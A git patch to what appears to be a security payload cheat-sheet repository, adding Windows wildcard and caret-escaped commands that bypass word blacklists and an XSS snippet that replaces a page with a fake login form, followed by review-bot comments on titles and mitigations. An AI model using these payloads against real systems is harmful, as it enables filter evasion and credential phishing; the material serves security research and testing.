From ea0bddc18a12d6ad46e763fbc52f93481b1a5620 Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Tue, 8 Jan 2019 20:49:05 +0100
Subject: [PATCH] Windows RCE wildcard + XSS UI redressing

---
 Remote commands execution/README.md | 6 ++++++
 XSS injection/README.md             | 9 +++++++++
 2 files changed, 15 insertions(+)

diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md
index 38d3589..828a481 100644
--- a/Remote commands execution/README.md	
+++ b/Remote commands execution/README.md	
@@ -110,6 +110,12 @@ cat ${test//hhh\/hm/}
 cat ${test//hh??hm/}
 ```
 
+Bypass blacklisted word with wildcards
+```powershell
+powershell C:\*\*2\n??e*d.*? # notepad
+@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
+```
+
 Bypass zsh/bash/sh blacklist
 
 ```powershell
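Review bot: The new heading `Bypass blacklisted word with wildcards` does not say that it is Windows-specific, although the sections around it (`cat ${test//hh??hm/}` above, `Bypass zsh/bash/sh blacklist` below) are about Unix shells; I would retitle it `Bypass blacklisted words with wildcards (Windows)`. The second sample line relies on `^`, which is the cmd.exe escape character, so the `powershell` fence label only fits the first line; a short comment naming the interpreter each line is meant for would avoid confusion. For readers on the defending side, consider adding a sentence such as `Filters that match literal binary names in the command line miss these forms; compare against the resolved image path from process-creation logs instead.`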
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 781975e..9df2b3e 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -33,6 +33,15 @@ fclose($fp);
 ?>
 ```
 
+UI redressing (Sophisticated phishing)
+
+```html
+<script>
+history.replaceState(null, null, '../../../login');
+document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>"
+</script>
+```
+
 Keylogger for XSS
 
 ```javascript
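Review bot: The heading `UI redressing (Sophisticated phishing)` uses a term that usually refers to clickjacking, whereas the added snippet rewrites the page body and the displayed path from an injected script; a title such as `Login form spoofing via XSS` would describe it more accurately. The section also has no prose, so I would add a sentence explaining that `history.replaceState` only changes the path shown in the address bar and that the document stays on the vulnerable page's origin. A short mitigation line would round it out, e.g. `Prevented by fixing the injection point (contextual output encoding) and by a Content-Security-Policy that disallows inline scripts.`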